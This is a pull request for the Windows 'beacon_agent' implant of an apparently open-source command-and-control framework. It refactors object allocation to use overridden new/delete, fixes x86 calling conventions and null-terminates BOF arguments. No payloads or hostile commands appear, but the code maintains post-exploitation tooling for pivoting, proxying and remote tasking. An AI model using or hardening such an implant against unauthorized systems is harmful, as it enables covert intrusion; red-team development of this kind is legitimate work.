### PR TITLE
stability/compatibility improvements for beacon_agent

### DIFF
--- a/Extenders/beacon_agent/pl_agent.go
+++ b/Extenders/beacon_agent/pl_agent.go
@@ -576,6 +576,7 @@ func CreateTask(ts Teamserver, agent adaptix.AgentData, args map[string]any) (ad
 				params, err = base64.StdEncoding.DecodeString(paramData)
 				if err != nil {
 					params = []byte(paramData)
+					params = append(params, 0)
 				}
 			}
 

--- a/Extenders/beacon_agent/src_beacon/beacon/Agent.cpp
+++ b/Extenders/beacon_agent/src_beacon/beacon/Agent.cpp
@@ -4,31 +4,25 @@
 #include "Packer.h"
 #include "Crypt.h"
 
+void* Agent::operator new(size_t sz) {
+	void* p = MemAllocLocal(sz);
+	return p;
+}
+
+void Agent::operator delete(void* p) noexcept {
+	MemFreeLocal(&p, sizeof(Agent));
+}
+
 Agent::Agent()
 {
-	info  = (AgentInfo*) MemAllocLocal(sizeof(AgentInfo));
-	*info = AgentInfo();
-	
-	config  = (AgentConfig*) MemAllocLocal(sizeof(AgentConfig));
-	*config = AgentConfig();
-
-	commander  = (Commander*) MemAllocLocal(sizeof(AgentConfig));
-	*commander = Commander(this);
-
-	downloader  = (Downloader*) MemAllocLocal(sizeof(Downloader));
-	*downloader = Downloader( config->download_chunk_size );
-
-	jober  = (JobsController*)MemAllocLocal(sizeof(JobsController));
-	*jober = JobsController();
-
-	memorysaver  = (MemorySaver*)MemAllocLocal(sizeof(MemorySaver));
-	*memorysaver = MemorySaver();
-
-	proxyfire  = (Proxyfire*)MemAllocLocal(sizeof(Proxyfire));
-	*proxyfire = Proxyfire();
-
-	pivotter  = (Pivotter*)MemAllocLocal(sizeof(Pivotter));
-	*pivotter = Pivotter();
+	info = new AgentInfo();
+	config = new AgentConfig();
+	commander = new Commander(this);
+	downloader = new Downloader( config->download_chunk_size );
+	jober = new JobsController();
+	memorysaver = new MemorySaver();
+	proxyfire = new Proxyfire();
+	pivotter = new Pivotter();
 
 	SessionKey = (PBYTE) MemAllocLocal(16);
 	for (int i = 0; i < 16; i++)
@@ -93,8 +87,7 @@ BYTE* Agent::BuildBeat(ULONG* size)
 	flag <<= 1;
 	flag += this->info->arch64;
 
-	Packer* packer = (Packer*) MemAllocLocal(sizeof(Packer));
-	*packer = Packer();
+	Packer* packer = new Packer();
 
 	packer->Pack32(this->config->agent_type);
 	packer->Pack32(this->info->agent_id);
@@ -154,7 +147,7 @@ BYTE* Agent::BuildBeat(ULONG* size)
 
 #endif
 
-	MemFreeLocal((LPVOID*)&packer, sizeof(Packer));
+	delete packer;
 
 	*size = beat_size;
 	return beat;

--- a/Extenders/beacon_agent/src_beacon/beacon/Agent.h
+++ b/Extenders/beacon_agent/src_beacon/beacon/Agent.h
@@ -33,4 +33,8 @@ public:
 	BOOL  IsActive();
 	ULONG GetWorkingSleep();
 	BYTE* BuildBeat(ULONG* size);
+
+	static void* operator new(size_t sz);
+	static void operator delete(void* p) noexcept;
+
 };

--- a/Extenders/beacon_agent/src_beacon/beacon/AgentConfig.cpp
+++ b/Extenders/beacon_agent/src_beacon/beacon/AgentConfig.cpp
@@ -4,6 +4,15 @@
 #include "utils.h"
 #include "config.h"
 
+void* AgentConfig::operator new(size_t sz) {
+	void* p = MemAllocLocal(sz);
+	return p;
+}
+
+void AgentConfig::operator delete(void* p) noexcept {
+	MemFreeLocal(&p, sizeof(AgentConfig));
+}
+
 AgentConfig::AgentConfig()
 {
 	ULONG length       = 0;
@@ -11,8 +20,7 @@ AgentConfig::AgentConfig()
 	CHAR* ProfileBytes = (CHAR*) MemAllocLocal(size);
 	memcpy(ProfileBytes, getProfile(), size);
 
-	Packer* packer = (Packer*)MemAllocLocal(sizeof(Packer));
-	*packer = Packer( (BYTE*)ProfileBytes, size);
+	Packer* packer = new Packer( (BYTE*)ProfileBytes, size);
 	ULONG profileSize = packer->Unpack32();
 
 	this->encrypt_key = (PBYTE) MemAllocLocal(16);
@@ -68,7 +76,7 @@ AgentConfig::AgentConfig()
 
 	this->download_chunk_size = 0x19000;
 
-	MemFreeLocal((LPVOID*)&packer, sizeof(Packer));
+	delete packer;
 	MemFreeLocal((LPVOID*)&ProfileBytes, size);
 
 }

--- a/Extenders/beacon_agent/src_beacon/beacon/AgentConfig.h
+++ b/Extenders/beacon_agent/src_beacon/beacon/AgentConfig.h
@@ -59,4 +59,7 @@ public:
 #endif
 
 	AgentConfig();
+
+	static void* operator new(size_t sz);
+	static void operator delete(void* p) noexcept;
 };

--- a/Extenders/beacon_agent/src_beacon/beacon/AgentInfo.cpp
+++ b/Extenders/beacon_agent/src_beacon/beacon/AgentInfo.cpp
@@ -2,6 +2,15 @@
 #include "AgentInfo.h"
 #include "utils.h"
 
+void* AgentInfo::operator new(size_t sz) {
+	void* p = MemAllocLocal(sz);
+	return p;
+}
+
+void AgentInfo::operator delete(void* p) noexcept {
+	MemFreeLocal(&p, sizeof(AgentInfo));
+}
+
 AgentInfo::AgentInfo()
 {
 	SYSTEM_PROCESSOR_INFORMATION SystemInfo = { 0 };

--- a/Extenders/beacon_agent/src_beacon/beacon/AgentInfo.h
+++ b/Extenders/beacon_agent/src_beacon/beacon/AgentInfo.h
@@ -25,4 +25,7 @@ public:
 	CHAR* username;
 
 	AgentInfo();
+
+	static void* operator new(size_t sz);
+	static void operator delete(void* p) noexcept;
 };

--- a/Extenders/beacon_agent/src_beacon/beacon/Boffer.cpp
+++ b/Extenders/beacon_agent/src_beacon/beacon/Boffer.cpp
@@ -29,8 +29,7 @@ int my_strncpy_s(char* dest, unsigned int destsz, const char* src, unsigned int 
 void InitBofOutputData()
 {
 	if (bofOutputPacker == NULL) {
-		bofOutputPacker = (Packer*)MemAllocLocal(sizeof(Packer));
-		*bofOutputPacker = Packer();
+		bofOutputPacker = new Packer();
 	}
 }
 

--- a/Extenders/beacon_agent/src_beacon/beacon/Commander.cpp
+++ b/Extenders/beacon_agent/src_beacon/beacon/Commander.cpp
@@ -1,6 +1,15 @@
 #include "Commander.h"
 #include "Boffer.h"
 
+void* Commander::operator new(size_t sz) {
+	void* p = MemAllocLocal(sz);
+	return p;
+}
+
+void Commander::operator delete(void* p) noexcept {
+	MemFreeLocal(&p, sizeof(Commander));
+}
+
 Commander::Commander(Agent* a)
 {
 	this->agent = a;
@@ -11,12 +20,11 @@ void Commander::ProcessCommandTasks(BYTE* recv, ULONG recvSize, Packer* outPacke
 	if (recvSize < 8)
 		return;
 
-	Packer* inPacker  = (Packer*)MemAllocLocal(sizeof(Packer));
-	*inPacker = Packer( recv, recvSize );
+	Packer* inPacker = new Packer( recv, recvSize );
 
 	ULONG packerSize = inPacker->Unpack32();
 	if (packerSize > recvSize - 4) {
-		MemFreeLocal((LPVOID*)&inPacker, sizeof(Packer));
+		delete inPacker;
 		return;
 	}
 
@@ -125,7 +133,7 @@ void Commander::ProcessCommandTasks(BYTE* recv, ULONG recvSize, Packer* outPacke
 		}
 	}
 	if (inPacker)
-		MemFreeLocal((LPVOID*) &inPacker, sizeof(Packer));
+		delete inPacker;
 }
 
 void Commander::CmdCat(ULONG commandId, Packer* inPacker, Packer* outPacker)

--- a/Extenders/beacon_agent/src_beacon/beacon/Commander.h
+++ b/Extenders/beacon_agent/src_beacon/beacon/Commander.h
@@ -74,4 +74,7 @@ public:
 
 	void CmdSaveMemory(ULONG commandId, Packer* inPacker, Packer* outPacker);
 	void Exit(Packer* outPacker);
+
+	static void* operator new(size_t sz);
+	static void operator delete(void* p) noexcept;
 };

--- a/Extenders/beacon_agent/src_beacon/beacon/ConnectorHTTP.cpp
+++ b/Extenders/beacon_agent/src_beacon/beacon/ConnectorHTTP.cpp
@@ -3,6 +3,7 @@
 #include "ApiDefines.h"
 #include "ProcLoader.h"
 #include "Encoders.h"
+#include "utils.h"
 
 BOOL _isdigest(char c)
 {
@@ -40,6 +41,15 @@ DWORD _strlen(CHAR* str)
 	if (str != NULL)
 		for (; str[i]; i++);
 	return i;
+}
+
+void* ConnectorHTTP::operator new(size_t sz) {
+	void* p = MemAllocLocal(sz);
+	return p;
+}
+
+void ConnectorHTTP::operator delete(void* p) noexcept {
+	MemFreeLocal(&p, sizeof(ConnectorHTTP));
 }
 
 ConnectorHTTP::ConnectorHTTP()

--- a/Extenders/beacon_agent/src_beacon/beacon/ConnectorHTTP.h
+++ b/Extenders/beacon_agent/src_beacon/beacon/ConnectorHTTP.h
@@ -85,4 +85,7 @@ public:
 	BYTE* RecvData();
 	int   RecvSize();
 	void  RecvClear();
+
+	static void* operator new(size_t sz);
+	static void operator delete(void* p) noexcept;
 };

--- a/Extenders/beacon_agent/src_beacon/beacon/ConnectorSMB.cpp
+++ b/Extenders/beacon_agent/src_beacon/beacon/ConnectorSMB.cpp
@@ -2,6 +2,16 @@
 #include "ApiLoader.h"
 #include "ApiDefines.h"
 #include "ProcLoader.h"
+#include "utils.h"
+
+void* ConnectorSMB::operator new(size_t sz) {
+	void* p = MemAllocLocal(sz);
+	return p;
+}
+
+void ConnectorSMB::operator delete(void* p) noexcept {
+	MemFreeLocal(&p, sizeof(ConnectorSMB));
+}
 
 ConnectorSMB::ConnectorSMB()
 {

--- a/Extenders/beacon_agent/src_beacon/beacon/ConnectorSMB.h
+++ b/Extenders/beacon_agent/src_beacon/beacon/ConnectorSMB.h
@@ -2,6 +2,8 @@
 
 #include <windows.h>
 #include <aclapi.h>
+
+#define _NO_NTDLL_CRT_
 #include "ntdll.h"
 
 #ifndef PROFILE_STRUCT
@@ -84,4 +86,7 @@ public:
 	BYTE* RecvData();
 	int RecvSize();
 	void  RecvClear();
+
+	static void* operator new(size_t sz);
+	static void operator delete(void* p) noexcept;
 };

--- a/Extenders/beacon_agent/src_beacon/beacon/ConnectorTCP.cpp
+++ b/Extenders/beacon_agent/src_beacon/beacon/ConnectorTCP.cpp
@@ -2,6 +2,16 @@
 #include "ApiLoader.h"
 #include "ApiDefines.h"
 #include "ProcLoader.h"
+#include "utils.h"
+
+void* ConnectorTCP::operator new(size_t sz) {
+	void* p = MemAllocLocal(sz);
+	return p;
+}
+
+void ConnectorTCP::operator delete(void* p) noexcept {
+	MemFreeLocal(&p, sizeof(ConnectorTCP));
+}
 
 ConnectorTCP::ConnectorTCP()
 {

--- a/Extenders/beacon_agent/src_beacon/beacon/ConnectorTCP.h
+++ b/Extenders/beacon_agent/src_beacon/beacon/ConnectorTCP.h
@@ -83,4 +83,7 @@ public:
 	BYTE* RecvData();
 	int   RecvSize();
 	void  RecvClear();
+
+	static void* operator new(size_t sz);
+	static void operator delete(void* p) noexcept;
 };

--- a/Extenders/beacon_agent/src_beacon/beacon/Downloader.cpp
+++ b/Extenders/beacon_agent/src_beacon/beacon/Downloader.cpp
@@ -1,6 +1,15 @@
 #include "Downloader.h"
 #include "utils.h"
 
+void* Downloader::operator new(size_t sz) {
+	void* p = MemAllocLocal(sz);
+	return p;
+}
+
+void Downloader::operator delete(void* p) noexcept {
+	MemFreeLocal(&p, sizeof(Downloader));
+}
+
 Downloader::Downloader(ULONG chunk_size)
 {
 	this->chunkSize = chunk_size;

--- a/Extenders/beacon_agent/src_beacon/beacon/Downloader.h
+++ b/Extenders/beacon_agent/src_beacon/beacon/Downloader.h
@@ -35,4 +35,7 @@ public:
 	DownloadData CreateDownloadData(ULONG taskId, HANDLE hFile, ULONG size);
 	void         ProcessDownloader(Packer* packer);
 	BOOL		 IsTasks();
+
+	static void* operator new(size_t sz);
+	static void operator delete(void* p) noexcept;
 };

--- a/Extenders/beacon_agent/src_beacon/beacon/JobsController.cpp
+++ b/Extenders/beacon_agent/src_beacon/beacon/JobsController.cpp
@@ -1,6 +1,15 @@
 #include "JobsController.h"
 #include "ApiLoader.h"
 
+void* JobsController::operator new(size_t sz) {
+	void* p = MemAllocLocal(sz);
+	return p;
+}
+
+void JobsController::operator delete(void* p) noexcept {
+	MemFreeLocal(&p, sizeof(JobsController));
+}
+
 JobData JobsController::CreateJobData(ULONG taskId, WORD Type, WORD State, HANDLE object, WORD pid, HANDLE input, HANDLE output)
 {
     JobData jobData = { taskId, Type, State, object, pid, input, output };

--- a/Extenders/beacon_agent/src_beacon/beacon/JobsController.h
+++ b/Extenders/beacon_agent/src_beacon/beacon/JobsController.h
@@ -30,4 +30,7 @@ public:
 
     JobData CreateJobData(ULONG taskId, WORD Type, WORD State, HANDLE object, WORD pid, HANDLE input, HANDLE output);
     void    ProcessJobs(Packer* packer);
+
+	static void* operator new(size_t sz);
+	static void operator delete(void* p) noexcept;
 };

--- a/Extenders/beacon_agent/src_beacon/beacon/MainAgent.cpp
+++ b/Extenders/beacon_agent/src_beacon/beacon/MainAgent.cpp
@@ -17,11 +17,8 @@ void AgentMain()
 	if ( !ApiLoad() ) 
 		return;
 
-	g_Agent  = (Agent*) MemAllocLocal(sizeof(Agent));
-	*g_Agent = Agent();
-
-	g_Connector = (ConnectorHTTP*) MemAllocLocal(sizeof(ConnectorHTTP));
-	*g_Connector = ConnectorHTTP();
+	g_Agent = new Agent();
+	g_Connector = new ConnectorHTTP();
 
 	ULONG beatSize = 0;
 	BYTE* beat = g_Agent->BuildBeat(&beatSize);
@@ -29,8 +26,7 @@ void AgentMain()
 	if ( !g_Connector->SetConfig(g_Agent->config->profile, beat, beatSize) )
 		return;
 
-	Packer* packerOut = (Packer*)MemAllocLocal(sizeof(Packer));
-	*packerOut = Packer();
+	Packer* packerOut = new Packer();
 	packerOut->Pack32(0);
 
 	do {
@@ -91,11 +87,8 @@ void AgentMain()
 	if (!ApiLoad())
 		return;
 
-	g_Agent = (Agent*)MemAllocLocal(sizeof(Agent));
-	*g_Agent = Agent();
-
-	g_Connector = (ConnectorSMB*)MemAllocLocal(sizeof(ConnectorSMB));
-	*g_Connector = ConnectorSMB();
+	g_Agent = new Agent();
+	g_Connector = new ConnectorSMB();
 
 	if (!g_Connector->SetConfig(g_Agent->config->profile, NULL, NULL))
 		return;
@@ -103,8 +96,7 @@ void AgentMain()
 	ULONG beatSize = 0;
 	BYTE* beat = g_Agent->BuildBeat(&beatSize);
 
-	Packer* packerOut = (Packer*)MemAllocLocal(sizeof(Packer));
-	*packerOut = Packer();
+	Packer* packerOut = new Packer();
 	packerOut->Pack32(0);
 
 	do {
@@ -178,11 +170,8 @@ void AgentMain()
 	if (!ApiLoad())
 		return;
 
-	g_Agent = (Agent*)MemAllocLocal(sizeof(Agent));
-	*g_Agent = Agent();
-
-	g_Connector = (ConnectorTCP*)MemAllocLocal(sizeof(ConnectorTCP));
-	*g_Connector = ConnectorTCP();
+	g_Agent = new Agent();
+	g_Connector = new ConnectorTCP();
 
 	if (!g_Connector->SetConfig(g_Agent->config->profile, NULL, NULL))
 		return;
@@ -190,8 +179,7 @@ void AgentMain()
 	ULONG beatSize = 0;
 	BYTE* beat = g_Agent->BuildBeat(&beatSize);
 
-	Packer* packerOut = (Packer*)MemAllocLocal(sizeof(Packer));
-	*packerOut = Packer();
+	Packer* packerOut = new Packer();
 	packerOut->Pack32(0);
 
 	do {
@@ -241,6 +229,8 @@ void AgentMain()
 		g_Connector->Disconnect();
 
 	} while (g_Agent->IsActive());
+	
+	delete packerOut;
 
 	MemFreeLocal((LPVOID*)&beat, beatSize);
 

--- a/Extenders/beacon_agent/src_beacon/beacon/MemorySaver.cpp
+++ b/Extenders/beacon_agent/src_beacon/beacon/MemorySaver.cpp
@@ -1,5 +1,14 @@
 #include "MemorySaver.h"
 
+void* MemorySaver::operator new(size_t sz) {
+	void* p = MemAllocLocal(sz);
+	return p;
+}
+
+void MemorySaver::operator delete(void* p) noexcept {
+	MemFreeLocal(&p, sizeof(MemorySaver));
+}
+
 MemorySaver::MemorySaver(){}
 
 void MemorySaver::WriteMemoryData(ULONG memoryId, ULONG totalSize, ULONG dataSize, PBYTE data)

--- a/Extenders/beacon_agent/src_beacon/beacon/MemorySaver.h
+++ b/Extenders/beacon_agent/src_beacon/beacon/MemorySaver.h
@@ -20,4 +20,7 @@ public:
 
 	void WriteMemoryData(ULONG memoryId, ULONG totalSize, ULONG dataSize, PBYTE data);
 	void RemoveMemoryData(ULONG memoryId);
+
+	static void* operator new(size_t sz);
+	static void operator delete(void* p) noexcept;
 };

--- a/Extenders/beacon_agent/src_beacon/beacon/Packer.cpp
+++ b/Extenders/beacon_agent/src_beacon/beacon/Packer.cpp
@@ -1,5 +1,14 @@
 #include "Packer.h"
 
+void* Packer::operator new(size_t sz) {
+	void* p = MemAllocLocal(sz);
+	return p;
+}
+
+void Packer::operator delete(void* p) noexcept {
+	MemFreeLocal(&p, sizeof(Packer));
+}
+
 Packer::Packer()
 {       
     this->buffer = (BYTE*) MemAllocLocal(4);

--- a/Extenders/beacon_agent/src_beacon/beacon/Packer.h
+++ b/Extenders/beacon_agent/src_beacon/beacon/Packer.h
@@ -31,4 +31,7 @@ public:
 	VOID  Clear(BOOL renew);
 	PBYTE data();
 	ULONG datasize();
+
+	static void* operator new(size_t sz);
+	static void operator delete(void* p) noexcept;
 };

--- a/Extenders/beacon_agent/src_beacon/beacon/Pivotter.cpp
+++ b/Extenders/beacon_agent/src_beacon/beacon/Pivotter.cpp
@@ -1,5 +1,14 @@
 #include "Pivotter.h"
 
+void* Pivotter::operator new(size_t sz) {
+	void* p = MemAllocLocal(sz);
+	return p;
+}
+
+void Pivotter::operator delete(void* p) noexcept {
+	MemFreeLocal(&p, sizeof(Pivotter));
+}
+
 void Pivotter::LinkPivotSMB(ULONG taskId, ULONG commandId, CHAR* pipename, Packer* outPacker)
 {
 	HANDLE hPipe;

--- a/Extenders/beacon_agent/src_beacon/beacon/Pivotter.h
+++ b/Extenders/beacon_agent/src_beacon/beacon/Pivotter.h
@@ -29,4 +29,7 @@ public:
 	void LinkPivotTCP(ULONG taskId, ULONG commandId, CHAR* address, WORD port, Packer* outPacker);
 	void UnlinkPivot(ULONG taskId, ULONG commandId, ULONG pivotId, Packer* outPacker);
 	void WritePivot(ULONG pivotId, BYTE* data, ULONG size);
+
+	static void* operator new(size_t sz);
+	static void operator delete(void* p) noexcept;
 };

--- a/Extenders/beacon_agent/src_beacon/beacon/Proxyfire.cpp
+++ b/Extenders/beacon_agent/src_beacon/beacon/Proxyfire.cpp
@@ -14,6 +14,15 @@ void PackProxyData(Packer* packer, ULONG channelId, BYTE* data, ULONG dataSize )
 	packer->PackBytes(data, dataSize);
 }
 
+void* Proxyfire::operator new(size_t sz) {
+	void* p = MemAllocLocal(sz);
+	return p;
+}
+
+void Proxyfire::operator delete(void* p) noexcept {
+	MemFreeLocal(&p, sizeof(Proxyfire));
+}
+
 void Proxyfire::AddProxyData(ULONG channelId, SOCKET sock, ULONG waitTime, ULONG mode, ULONG address, WORD port, ULONG state)
 {
 	TunnelData tunnelData = { 0 };

--- a/Extenders/beacon_agent/src_beacon/beacon/Proxyfire.h
+++ b/Extenders/beacon_agent/src_beacon/beacon/Proxyfire.h
@@ -50,4 +50,7 @@ public:
 	void ConnectMessageReverse(ULONG tunnelId, WORD port, Packer* outPacker);
 
 	void AddProxyData(ULONG channelId, SOCKET sock, ULONG waitTime, ULONG mode, ULONG address, WORD port, ULONG state);
+
+	static void* operator new(size_t sz);
+	static void operator delete(void* p) noexcept;
 };

--- a/Extenders/beacon_agent/src_beacon/beacon/ntdll.h
+++ b/Extenders/beacon_agent/src_beacon/beacon/ntdll.h
@@ -14697,6 +14697,7 @@ typedef const GUID *LPCGUID;
 #endif
 
 NTSTATUS
+NTAPI
 RtlGetVersion(
     OUT PRTL_OSVERSIONINFOW lpVersionInformation
     );
@@ -22379,6 +22380,7 @@ IMPORT_FN wchar_t * __cdecl wcsncpy(wchar_t *dest, const wchar_t *source, size_t
 
 NTSYSAPI
 ULONG
+NTAPI
 RtlRandomEx(
     PULONG Seed
 );

--- a/Extenders/beacon_agent/src_beacon/beacon/utils.cpp
+++ b/Extenders/beacon_agent/src_beacon/beacon/utils.cpp
@@ -462,7 +462,7 @@ CHAR* StrTokA(CHAR* str, CHAR* delim)
     return token_start;
 }
 
-DWORD StrCmpA(CHAR* str1, CHAR* str2)
+DWORD StrCmpA(const CHAR* str1, const CHAR* str2)
 {
     while (*str1 && (*str1 == *str2)) {
         str1++;
@@ -534,7 +534,7 @@ DWORD StrCmpLowW(WCHAR* str1, WCHAR* str2)
     return *str1 - *str2;
 }
 
-DWORD StrLenA(CHAR* str)
+DWORD StrLenA(const CHAR* str)
 {
     int i = 0;
     if (str != NULL)

--- a/Extenders/beacon_agent/src_beacon/beacon/utils.h
+++ b/Extenders/beacon_agent/src_beacon/beacon/utils.h
@@ -71,9 +71,9 @@ CHAR* StrTokA(CHAR* str, CHAR* delim);
 
 DWORD StrIndexA(CHAR* str, CHAR target);
 
-DWORD StrLenA(CHAR* str);
+DWORD StrLenA(const CHAR* str);
 
-DWORD StrCmpA(CHAR* str1, CHAR* str2);
+DWORD StrCmpA(const CHAR* str1, const CHAR* str2);
 
 DWORD StrNCmpA(CHAR* str1, CHAR* str2, SIZE_T n);
 


### PR DESCRIPTION
Did some fixes to improve stability and compatibility with CS for the default windows beacon.

1. Problem in `BeaconFormatPrintf`/`BeaconPrintf` because `vsnprintf` returns -1 on error which is later used as size leading to crash. 
-1 is returned if you use %S and supply something that cannot be converted to ACP locale. (ex. wide RU text on EN only machine)

2. Problem in `BeaconAddValue` and family. It stores `Char*` as raw pointer inside `Map<CHAR*, LPVOID> Values;`
Changed to store actual key value.
Bug makes using this API pointless, it will never return cached value (pointer will never be same as BOF gets new BASE address every time).

3. Ntdll `RtlRandomEx`,`RtlGetVersion` `__stdcall` for x86 (crash on shifted stack)
I do not know how this survived many releases as it crashed for me every time.
Added NTAPI to definition for 2 APIs only, but it definitely missing from many others as well (maybe find a better ntdll header file?).

4. Classes that store `this` during initialization will get pointer to temporary memory (on stack) because of current construction method. Code changed to use `new`/`delete` with overridden `operator new`/`operator delete` for each of beacon class.
This one is a bit tricky. Currently used method does not cause crash, but once you start playing with compiler options - it will.
Copying class using `memcpy` is not a good idea in general. But it works ... until you store <this> pointer during class initialization, like here:
```
Agent::Agent()
{
	...
	commander  = (Commander*) MemAllocLocal(sizeof(AgentConfig));
	*commander = Commander(this); // <<<<
```
I tested new method a bit, and it seems to be more reliable and clean (no class copy, while still using beacon memory allocator). 

5. I tested some of my BOFs and noticed that you don't place NULL byte for the `inline-execute` (`execute bof`).
```
`params = append(params, 0)`
if ok {
	params, err = base64.StdEncoding.DecodeString(paramData)
	if err != nil {
		params = []byte(paramData)
		params = append(params, 0) // <<<< NULL terminate
	}
}
```
You are using a bit convoluted way of passing arguments using base64 from CNA/AXS, so I changed code path that processes arguments if base64 fails (`execute bof` from console case).
It makes working with arguments inside BOF code a bit simpler, as we do not need to reallocate string using size just to null terminate it.